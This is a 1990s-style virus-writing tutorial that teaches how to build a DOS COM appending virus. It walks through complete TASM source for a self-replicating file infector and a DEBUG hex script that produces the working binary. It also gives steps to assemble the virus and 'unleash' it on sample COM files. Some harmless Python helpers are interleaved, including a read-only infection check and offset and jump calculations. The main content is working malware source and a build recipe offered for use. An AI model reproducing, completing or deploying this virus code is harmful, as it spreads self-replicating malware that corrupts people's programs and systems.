Lesson 2: The COM Appending Virus
By Horny Toad
In the first lesson, we discussed how to write the most basic form of virus, the overwriting virus. This type of virus has serious deficiencies which, I hope, should be very obvious to you. Nonetheless, the basic overwriting virus is a necessary stepping stone in the overall virus writing curriculum. The next virus that we will be looking at is the COM appending infector. This virus is a step up in that it infects the host program without destroying it.
As the complexity of the virii increases, so do the concepts that go with them. With the overwriting virus, we weren't very concerned with the host program, the one that we were infecting, quite simply because it was going to be destroyed. With the appending virus, our ultimate goal is not to harm the host program, but to modify it slightly so that it holds the virus code and can still run afterwards. Therefore, with the appender, you really need to visualize what is happening with your virus code and its effects on the host program. Memory usage and management are going to start playing a bigger part in your virus writing. And you can't relax after learning this virus: with EXE infectors, resident and boot virii, memory will continue to haunt you. Then, once you have a grasp on memory management, I will throw some Windows programming your way and utterly confuse you. At this stage, just be happy with the virus that is in this tutorial. You have accomplished a great success when you can not only produce appending virii, but really understand what is going on. Don't listen to the people that criticize the shit out of overwriters and COM appenders. Understanding the basic concepts in virus programming will help to build a solid foundation in your coding skills and make the more difficult resident virii easier to grasp.
I have decided to continue with the format that I used in the first lesson to describe this virus. Therefore, when you are coding in the future and need a quick explanation of a certain technique, you only need to glance at the individual sections of this tutorial. Also, I do expect that you have gone through the first tutorial on overwriting infectors. In keeping with the Codebreaker's idea of easy-to-understand articles, I will continue to describe all of the basic assembly code, even if it was already touched upon in the first lesson.
I must add that the code in this article is unoptimized for the purpose of instruction. I specifically divided the code up into many different routines so that I could comment on each of them and what they do in the virus itself. I will also add that I code TASM-friendly assembly. I only use Borland's Turbo Assembler, and I suggest that you use it too. It is very easy to understand and the majority of virii out there are written with TASM in mind. If you still want to use MASM or some other assembler, fine, just make sure that you know the format that your code has to be in.
After I published the last tutorial, I received a few complaints that people didn't fully understand the use of registers and memory addressing. It was not my goal to completely explain certain complex concepts in the first tutorial. You did not need to know complex memory management to write an overwriter. In this tutorial, I will not be going over hooking interrupts, extended registers, or in-depth flag usage. Such techniques are not needed to understand a COM appender. In the next tutorial, I will be discussing EXE appenders and, in the fourth tutorial, resident virii. Be patient. Wait to learn the more difficult concepts until you need them. Otherwise, you will only get confused.
Well, on with the virus. Below is a copy of the basic COM appender, so that, throughout the tutorial, you can refer back to the basic skeleton code. During the explanation of the individual parts of code, I will offer different techniques to accomplish the same results as you see in the basic code.
code segment
        assume cs:code,ds:code
        org 100h
start:
        db 0e9h,0,0
toad:
        call bounce
bounce:
        pop bp
        sub bp,OFFSET bounce
first_three:
        mov cx,3
        lea si,[bp+OFFSET thrbyte]
        mov di,100h
        push di
        rep movsb
move_dta:
        lea dx,[bp+OFFSET hide_dta]
        mov ah,1ah
        int 21h
get_one:
        mov ah,4eh
        lea dx,[bp+comsig]
        mov cx,7
next:
        int 21h
        jnc openit
        jmp bug_out
openit:
        mov ax,3d02h
        lea dx,[bp+OFFSET hide_dta+1eh]
        int 21h
        xchg ax,bx
rec_thr:
        mov ah,3fh
        lea dx,[bp+thrbyte]
        mov cx,3
        int 21h
infect_chk:
        mov ax,word ptr [bp+hide_dta+1ah]
        mov cx,word ptr [bp+thrbyte+1]
        add cx,horny_toad-toad+3
        cmp ax,cx
        jz close_up
jmp_size:
        sub ax,3
        mov word ptr [bp+newjump+1],ax
to_begin:
        mov ax,4200h
        xor cx,cx
        xor dx,dx
        int 21h
write_jump:
        mov ah,40h
        mov cx,3
        lea dx,[bp+newjump]
        int 21h
to_end:
        mov ax,4202h
        xor cx,cx
        xor dx,dx
        int 21h
write_body:
        mov ah,40h
        mov cx,horny_toad-toad
        lea dx,[bp+toad]
        int 21h
close_up:
        mov ah,3eh
        int 21h
next_bug:
        mov ah,4fh
        jmp next
bug_out:
        mov dx,80h
        mov ah,1ah
        int 21h
        retn
comsig      db '*.com',0
thrbyte     db 0cdh,20h,0
newjump     db 0e9h,0,0
horny_toad  label near
hide_dta    db 42 dup (?)
code ENDS
END start
Well, that is the basic code that we will be using for the virus. Now, before we get into discussing what the individual lines of code do, let's try to conceptualize what a COM appending virus is. Take a look below at the steps that a COM appending virus takes when executed.
Outline of the COM Appending Virus
1. Determine the delta offset.
2. Restore the infected file's original 3 bytes.
3. Set a new DTA address.
4. Find a COM file.
5. If none, then go to step 16.
6. Open the file.
7. Read and store the first 3 bytes of the file.
8. Check if the file has been previously infected.
9. Calculate the size of the jump to the main virus body.
10. Move to the beginning of the file.
11. Write the jump to the main virus body.
12. Move to the end of the file.
13. Append the virus main body to the end of the file.
14. Close the file.
15. Find the next matching file. Back to step 4.
16. Return the DTA to 80 hex and restore control to the host program.
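Step 8 is what keeps the virus from infecting the same file over and over. In the listing (infect_chk), it compares the file size taken from the DTA with the jump distance stored after the E9h byte plus the virus length, 0A3h (163) bytes. The Python sketch below repeats that comparison as a read-only check on a file you already have; it is an illustration, not part of the virus, and the names marker_matches and looks_infected are made up for this example. It also adds one test the listing does not make: that the first byte really is E9h.

```python
import os

# Length checked by infect_chk: "add cx,horny_toad-toad+3" assembles to
# 81 C1 A3 00 in the debug script, i.e. 0A3h = 163 bytes.
TOAD2_LENGTH = 0xA3

def marker_matches(first_three: bytes, file_size: int) -> bool:
    """The infect_chk comparison: jump distance + 163 == file size.

    The listing compares 16-bit words, so both sides are masked to 16 bits.
    Unlike the listing, this also requires the first byte to be E9h.
    """
    if len(first_three) < 3 or first_three[0] != 0xE9:
        return False
    distance = int.from_bytes(first_three[1:3], "little")
    return (distance + TOAD2_LENGTH) & 0xFFFF == file_size & 0xFFFF

def looks_infected(path: str) -> bool:
    """Read-only check of a COM file on disk; nothing is written."""
    with open(path, "rb") as f:
        head = f.read(3)
    return marker_matches(head, os.path.getsize(path))

# A hypothetical 200-byte host after infection: 200 + 160 bytes long,
# starting with E9 C5 00 (a jump distance of 200 - 3 = 197).
print(marker_matches(bytes([0xE9, 0xC5, 0x00]), 360))  # True
print(marker_matches(bytes([0xCD, 0x20, 0x00]), 6))    # False
```

The sizes line up because the virus appends horny_toad - toad = 160 bytes and writes a jump distance of host size minus 3, so 197 + 163 = 200 + 160 = 360.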
I swore that I would never include cheesy graphics in my tutorials, but I guess I should, in order to give you a picture of what the virus and the host program look like before and after infection.
Before Infection

   Toad2 Virus          Innocent Program
   163 bytes            200 bytes
   -----------          -----------
   =         =          =         =
   =         =          =         =
   =         =          =         =
   =         =          =         =
   -----------          -----------

After Infection

   Offset 100h ---------------
               =Jump to Virus=  - 3 bytes long
               =Main Body    =
               =-------------=
               =             =  The delta offset is the calculation
               =  Innocent   =  of the amount of space that the virus
               =  Program    =  main body has moved down past the
               =  Main Body  =  Innocent program main body.
               =             =
               =-------------=
               =             =
               =  Virus Main =
               =  Body       =
               =             =
               =Data Section =
               =of Virus     =
               =--Original---=
               =--3 bytes of-=
               =--Innocent---=
               =--Program----=
               =-------------=
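To put numbers on the diagram, here is the delta offset worked out in Python for a hypothetical 200-byte innocent program. The label offsets (toad at 103h, bounce at 106h, thrbyte at 19Dh) are read off the debug script at the end of this tutorial; the function names are only for illustration and are not part of the virus.

```python
# Assemble-time offsets, read off the debug script (org 100h):
TOAD = 0x103      # 'toad', right after the 3-byte blank jump
BOUNCE = 0x106    # 'bounce', after the 3-byte "call bounce" (81 ED 06 01 = sub bp,0106h)
THRBYTE = 0x19D   # 'thrbyte' (8D B6 9D 01 = lea si,[bp+019Dh])

def runtime_offset(label: int, host_size: int) -> int:
    """Where an assemble-time label really sits once the body is appended.

    The appended body begins at 'toad', which lands at 100h + host_size
    because DOS loads a COM file at offset 100h.
    """
    return 0x100 + host_size + (label - TOAD)

def delta_offset(host_size: int) -> int:
    # call bounce / pop bp  -> runtime address of bounce
    # sub bp,OFFSET bounce  -> minus its assemble-time address
    return runtime_offset(BOUNCE, host_size) - BOUNCE

# The first generation behaves like a 3-byte host (just the blank jump).
print(delta_offset(3))                    # 0
# Hypothetical 200-byte host:
print(delta_offset(200))                  # 197
print(hex(THRBYTE + delta_offset(200)))   # 0x262, what [bp+OFFSET thrbyte] points at
print(hex(runtime_offset(THRBYTE, 200)))  # 0x262, where thrbyte actually is
```

For any host the delta comes out to host size minus 3, the same value the virus stores after E9h in the jump at 100h: both measure how far toad has been pushed past 103h, the address the assembler originally gave it.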
Hopefully, I haven't completely discouraged and confused you. Once the individual sections of code are explained, all of these steps will make sense. Something that you must remember when looking at the virus code is that the virus is currently in its first generation. It hasn't yet infected a file. When you are trying to figure out how the virus code works, you will have to think of it in terms of the first time it runs as well as when the infected program is running.
Well, let's have a look at the code.
code segment
The segment directive defines the parameters for a segment. In this instance we are defining the code segment. All of the executable code, the meat of our program, will lie inside of the code segment. This segment does not necessarily have to be named "code", but it is only logical, and a good programming convention, to name it that. If we were dealing with a larger program, one that had many procedures or external calls, we would definitely want to define a specific data segment separate from the code. Since this is a very small piece of code, the two will be intermixed.
assume cs:code,ds:code
The assume directive lies within the code segment and associates the name that you gave your segment, such as code, with a segment register. In our program, we are stating that the code and data segment registers will both be associated with the "code" segment. What does this mean? Basically, we are still setting up the parameters of our COM file. We are following convention by defining where things are in our program and how they are set up. Keep in mind that assume only informs the assembler; it does not load anything into the registers. For a COM file, DOS itself points CS, DS, ES and SS at the same segment when it loads the program. What are the CS and DS registers? The code segment register holds the starting address of your program's code segment. Essentially, it tells your computer where to begin to look for your executable code. The DS register holds the starting address of the data segment. Another register that I might as well bring up is the IP, or instruction pointer, register. The job of the IP is to hold the offset address of the next instruction that is to be executed. What is an offset address? An offset address is not a true address of a line in your program, but rather a distance from a given starting point. If you put the two concepts together, the code segment register combined with the instruction pointer register gives you the address of the next instruction in your program (in real mode the CPU multiplies the segment value by 16 and then adds the offset). The CS stays constant as the IP counts up through the code.
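A small Python sketch of that segment:offset arithmetic, segment times 16 plus offset. The CS value is made up; DOS chooses the real one when it loads the program. The result is kept to 20 bits, which models the original 8086 wrapping around at 1 MB.

```python
def physical_address(segment: int, offset: int) -> int:
    """8086 real-mode address: segment * 16 + offset, kept to 20 bits."""
    return ((segment << 4) + offset) & 0xFFFFF

# 0x1234 is a hypothetical CS value; a COM file starts executing at IP = 100h.
cs, ip = 0x1234, 0x0100
print(hex(physical_address(cs, ip)))  # 0x12440

# Different segment:offset pairs can name the same byte.
print(physical_address(0x1244, 0x0000) == physical_address(0x1234, 0x0100))  # True
```

This is also why an offset on its own is "not a true address": the same offset means a different byte depending on which segment it is paired with.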
org 100h
You should remember this from the overwriting virus. This directive tells the assembler that our code begins at offset 100h (256 bytes) in the segment, which is where DOS places a COM file. This 100h distance is the space taken up by the PSP, or Program Segment Prefix, so our code starts directly after it. When DOS loads a COM file, it places 100h in the IP, telling the computer where to begin. The PSP contains information about your program and is created in memory when the program is loaded (see Appendix 2).
start:
db 0e9h,0,0
The first instruction that needs to be coded is the jump to our virus code. In the initial execution of our virus, we only want to pass control to the next line of code, so we define a blank jump. The DB, or "define byte", directive is most commonly used in the data section of our virus to define strings of information. In this instance, we are literally defining an assembly instruction by hand. The instruction that we are defining is a near "jump". At the lowest level, the level at which the computer processes code, the assembler turns the "jmp" instruction into its binary form, "11101001". In coding assembly, the preferred numerical system is hexadecimal, so we convert the binary to e9h. The two zero bytes after it are the jump distance, which is counted from the end of the 3-byte instruction, so a distance of zero simply lands on the next line. No way am I getting into describing how to manually convert bin-dec-hex. I prefer to let my little old Casio do the conversions for me. Get back on track, Toad. Do you think that the jump instruction stays null once the virus has infected a program? If you answered "No", then congratulations. Once the virus has infected a program, the first instruction in the code of the infected host will be a jump to the main virus body. Each time the virus infects a program, the first 3 bytes, including the jump instruction, will be rewritten with a calculation to jump over the host program to the virus main body. As we progress through the virus, this will all become clearer.
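Here is the jump encoding as a small Python sketch. An E9h near jump is followed by a 16-bit little-endian distance, measured from the end of the 3-byte instruction. The listing's jmp_size routine does the same arithmetic in assembly: it takes the host's file size, subtracts 3 and stores the result after E9h in newjump. The function name and the 200-byte host are made up for illustration.

```python
import struct

def near_jump(from_offset: int, to_offset: int) -> bytes:
    """Encode an 8086 near JMP (opcode E9h) that sits at from_offset.

    The 16-bit distance is to_offset - (from_offset + 3), wrapped to
    16 bits and stored little-endian.
    """
    distance = (to_offset - (from_offset + 3)) & 0xFFFF
    return bytes([0xE9]) + struct.pack("<H", distance)

# First generation: the jump at 100h goes to the next instruction at 103h.
print(near_jump(0x100, 0x103).hex(" "))        # e9 00 00
# Hypothetical 200-byte host: the appended body starts at 100h + 200 = 1C8h.
print(near_jump(0x100, 0x100 + 200).hex(" "))  # e9 c5 00
```

Note the low byte comes first: a distance of 00C5h is stored as C5 00.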
toad:
call bounce
bounce:
pop bp
sub bp,OFFSET bounce
The Delta Offset. This is probably the single most important concept that you will have to learn when coding an appending virus. When you assemble the virus for the first time, the assembler calculates the value of all of the offsets. Once the virus has appended itself to the end of the host program, the offsets that the assembler calculated are all incorrect. They do not take into account the amount of space the code has moved forward, beyond the host program. Before we go into the calculation of the delta offset, let's look at the new instructions within this routine. The first is the "call" instruction. If you remember the old BASIC computer language, call is like GOSUB. A call instruction pushes the IP onto the stack. OK, let's take a look at that last sentence. What does it mean? Who's pushing who? And what the hell is a stack? Don't panic, we are going to take this nice and easy. The stack is a temporary memory location that can be used to store such things as the IP (the address of the next instruction) during a "call". The term "push" means that the data is being moved onto the stack. The opposite of "push" is "pop". The pop instruction transfers the data that was most recently pushed onto the stack to a specified destination. Don't freak out on me with this. At this point, this is all I want you to know about the stack: it is a temporary memory location. On to the calculation. The call instruction pushes the IP, the address of the next instruction, onto the stack. We then pop this address into bp. Then we subtract the original offset of bounce, which was determined when the virus was first assembled, from the value in bp. What is left in bp is the delta offset: 0 in the first generation, and the distance the code has moved once it sits inside an infected host.
To assemble the virus, type:
C:\>tasm toad2.asm
(You can actually do this from any directory that you want.)
The result should be:
Turbo Assembler Version 2.01
Assembling file: toad2.asm
Error Messages: none
Warning Messages: none
Passes: 1
Remaining Memory: 425k
If there was an error in the code, TASM will indicate it in the Error Messages line. If you have typed the code in yourself and there is an error, go back to the file "toad2.asm" and take a look at my code; it works. If there are too many problems with your code and you'd just like to see how all this stuff works, switch to the "create" directory and type the above instructions again. There is a copy of "toad2.asm", TASM and TLINK in this directory. What TASM has done is convert the ASM file into an OBJ file. In order to get an executable COM file, we need to use the linker. Type:
C:\>tlink /t toad2.obj
TLINK will create TOAD2.COM in the current directory. You now have a virus in front of you. Don't get scared, it won't bite. Now you will need to copy the virus from the current directory to the pond directory. Type:
C:\>copy toad2.com c:\pond\
Then type:
C:\>cd ..\pond
This will move you to the pond directory. Now list the contents of the directory by typing:
C:\pond>dir
You will see that there are some files in this directory, TOAD2.COM and FLY(1-3).COM. TOAD2.COM is your virus and FLY(1-3).COM are the files that you are going to infect. FLY.COM is just a simple COM file that does absolutely nothing. Easy prey! Take note of the sizes of the two kinds of files, 6 and 163 bytes. Now unleash the virus by typing:
C:\pond>toad2
Now list the contents of the directory again. You will see that the files FLY(1-3).COM have become a little larger; they are now infected. If all your attempts to assemble and link the toad2 virus fail, I have included a compiled copy of the toad2 virus and many fly.com files in the TOAD directory. Change to the TOAD directory and type toad2. The fly files will become infected.
Debug script of the Toad2 virus
For those of you who would rather not use the assembler for some ungodly reason, or if you are interested in viewing a hex dump of the virus in its first generation, here is the debug script of toad2.com. Looking at the debug script of your virus can also help you determine the length of certain parts of the virus. Take a look at the script below. You can see the blank jump "e9 00 00" at the beginning of the code for the jump to the main virus body. Look at the end of the script and you can find the int 20 "cd 20" and the blank jump in newjump "e9 00 00". To measure the length of certain parts of the virus, remember that each two-digit group equals one byte. For example, "e9" equals one byte. You can determine the total length of the virus by counting the number of groups in the script. In this case, the toad2 virus comes out to 163 bytes, which matches the 00A3 (hex) given to RCX near the end of the script. I hope that I have not confused you with this. I purposely put this section at the end of the tutorial because I did not want to go into detail on the use of debug. In the next edition of the zine there will be an article on using debug in virus writing. I just wanted to give you a taste of what is to come. In order to get a functioning virus from the code below, you need to find your copy of debug. Cut the code below out and save it to a file called toad2.txt. Then, at a prompt, with debug in the same directory, type:
debug < toad2.txt
N TOAD2.COM
E 0100 E9 00 00 E8 00 00 5D 81 ED 06 01 B9 03 00 8D B6
E 0110 9D 01 BF 00 01 57 F3 A4 8D 96 A3 01 B4 1A CD 21
E 0120 B4 4E 8D 96 97 01 B9 07 00 CD 21 73 03 EB 60 90
E 0130 B8 02 3D 8D 96 C1 01 CD 21 93 B4 3F 8D 96 9D 01
E 0140 B9 03 00 CD 21 3E 8B 86 BD 01 3E 8B 8E 9E 01 81
E 0150 C1 A3 00 3B C1 74 30 2D 03 00 3E 89 86 A1 01 B8
E 0160 00 42 33 C9 33 D2 CD 21 B4 40 B9 03 00 8D 96 A0
E 0170 01 CD 21 B8 02 42 33 C9 33 D2 CD 21 B4 40 B9 A0
E 0180 00 8D 96 03 01 CD 21 B4 3E CD 21 B4 4F EB 9A BA
E 0190 80 00 B4 1A CD 21 C3 2A 2E 63 6F 6D 00 CD 20 00
E 01A0 E9 00 00
RCX
00A3
W
Q
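If you would rather not count the two-digit groups by hand, a few lines of Python can do it. This sketch assumes the "E address byte byte ..." layout used in the script above and simply ignores every other line (N, RCX, the value after RCX, W, Q); the function name and the tiny sample script are made up for illustration.

```python
def count_entered_bytes(script: str) -> int:
    """Count the bytes typed in by DEBUG 'E' (enter) commands.

    Every two-digit hex group after the address on an 'E' line is one byte.
    """
    total = 0
    for line in script.splitlines():
        parts = line.split()
        if len(parts) > 2 and parts[0].upper() == "E":
            total += len(parts) - 2  # drop the 'E' and the address
    return total

# Hypothetical two-instruction script: a blank jump followed by INT 20h.
sample = """N TINY.COM
E 0100 E9 00 00
E 0103 CD 20
RCX
0005
W
Q"""
n = count_entered_bytes(sample)
print(n, format(n, "04X"))  # 5 0005
```

The count only equals the value you give RCX when the bytes run continuously from 0100. For the toad2 script that holds: ten full rows of 16 bytes (0100 to 019F) plus 3 bytes on the 01A0 row make 163, which is A3h.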
Appendix 1 - The Registers
AX   Accumulator register
BX   Base register
CX   Count register
DX   Data register
DS   Data Segment register
ES   Extra Segment register
SS   Stack Segment register
CS   Code Segment register
BP   Base Pointer register
SI   Source Index register
DI   Destination Index register
SP   Stack Pointer register
IP   Instruction Pointer register (offset of the next instruction)
F    Flags register
Appendix 2 - The PSP (from Ralf Brown's Interrupt List)

Format of Program Segment Prefix (PSP):
Offset  Size       Description     (Table 1032)
 00h    2 BYTEs    INT 20 instruction for CP/M CALL 0 program termination
                   the CDh 20h here is often used as a signature for a valid PSP
 02h    WORD       segment of first byte beyond memory allocated to program
 04h    BYTE       (DOS) unused filler
                   (OS/2) count of fake DOS version returns
 05h    BYTE       CP/M CALL 5 service request (FAR CALL to absolute 000C0h)
                   BUG: (DOS 2+ DEBUG) PSPs created by DEBUG point at 000BEh
 06h    WORD       CP/M compatibility--size of first segment for .COM files
 08h    2 BYTEs    remainder of FAR JMP at 05h
 0Ah    DWORD      stored INT 22 termination address
 0Eh    DWORD      stored INT 23 control-Break handler address
 12h    DWORD      DOS 1.1+ stored INT 24 critical error handler address
 16h    WORD       segment of parent PSP
 18h    20 BYTEs   DOS 2+ Job File Table, one byte per file handle, FFh = closed
 2Ch    WORD       DOS 2+ segment of environment for process (see #1033)
 2Eh    DWORD      DOS 2+ process's SS:SP on entry to last INT 21 call
 32h    WORD       DOS 3+ number of entries in JFT (default 20)
 34h    DWORD      DOS 3+ pointer to JFT (default PSP:0018h)
 38h    DWORD      DOS 3+ pointer to previous PSP (default FFFFFFFFh in 3.x)
                   used by SHARE in DOS 3.3
 3Ch    BYTE       DOS 4+ (DBCS) interim console flag (see AX=6301h)
                   Novell DOS 7 DBCS interim flag as set with AX=6301h
                   (possibly also used by Far East MS-DOS 3.2-3.3)
 3Dh    BYTE       (APPEND) TrueName flag (see INT 2F/AX=B711h)
 3Eh    BYTE       (Novell NetWare) flag: next byte initialized if CEh
                   (OS/2) capabilities flag
 3Fh    BYTE       (Novell NetWare) Novell task number if previous byte is CEh
 40h    2 BYTEs    DOS 5+ version to return on INT 21/AH=30h
 42h    WORD       (MSWindows3) selector of next PSP (PDB) in linked list
                   Windows keeps a linked list of Windows programs only
 44h    WORD       (MSWindows3) "PDB_Partition"
 46h    WORD       (MSWindows3) "PDB_NextPDB"
 48h    BYTE       (MSWindows3) bit 0 set if non-Windows application (WINOLDAP)
 49h    BYTE       unused by DOS versions <= 6.00
 4Ch    WORD       (MSWindows3) "PDB_EntryStack"
 4Eh    2 BYTEs    unused by DOS versions <= 6.00
 50h    3 BYTEs    DOS 2+ service request (INT 21/RETF instructions)
 53h    2 BYTEs    unused in DOS versions <= 6.00
 55h    7 BYTEs    unused in DOS versions <= 6.00; can be used to make first
                   FCB into an extended FCB
 5Ch    16 BYTEs   first default FCB, filled in from first commandline argument
                   overwrites second FCB if opened
 6Ch    16 BYTEs   second default FCB, filled in from second commandline argument
                   overwrites beginning of commandline if opened
 7Ch    4 BYTEs    unused
 80h    128 BYTEs  commandline / default DTA
                   command tail is BYTE for length of tail, N BYTEs for the tail,
                   followed by a BYTE containing 0Dh
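To show how two of these entries read in practice, here is a Python sketch that checks the CDh 20h signature at offset 00h and decodes the command tail at 80h (a length byte, the characters, then 0Dh). The PSP image is built by hand for a hypothetical command line; the function names are illustrative only.

```python
def has_psp_signature(psp: bytes) -> bool:
    """Offset 00h: the CDh 20h (INT 20) often used to recognise a valid PSP."""
    return psp[:2] == b"\xcd\x20"

def command_tail(psp: bytes) -> str:
    """Decode the command tail stored at offset 80h.

    80h holds the tail length N, the N characters start at 81h, and a 0Dh
    byte follows them (the 0Dh is not counted in N).
    """
    if len(psp) < 0x100:
        raise ValueError("a PSP is 256 (100h) bytes long")
    length = psp[0x80]
    return psp[0x81:0x81 + length].decode("ascii", errors="replace")

# A hypothetical 256-byte PSP image with the tail " /t test".
tail = b" /t test"
psp = bytearray(0x100)
psp[0:2] = b"\xcd\x20"
psp[0x80] = len(tail)
psp[0x81:0x81 + len(tail)] = tail
psp[0x81 + len(tail)] = 0x0D
print(has_psp_signature(bytes(psp)), repr(command_tail(bytes(psp))))
# True ' /t test'
```

Because the same 128 bytes at 80h also serve as the default DTA, a find-first or find-next call made without moving the DTA would overwrite this tail.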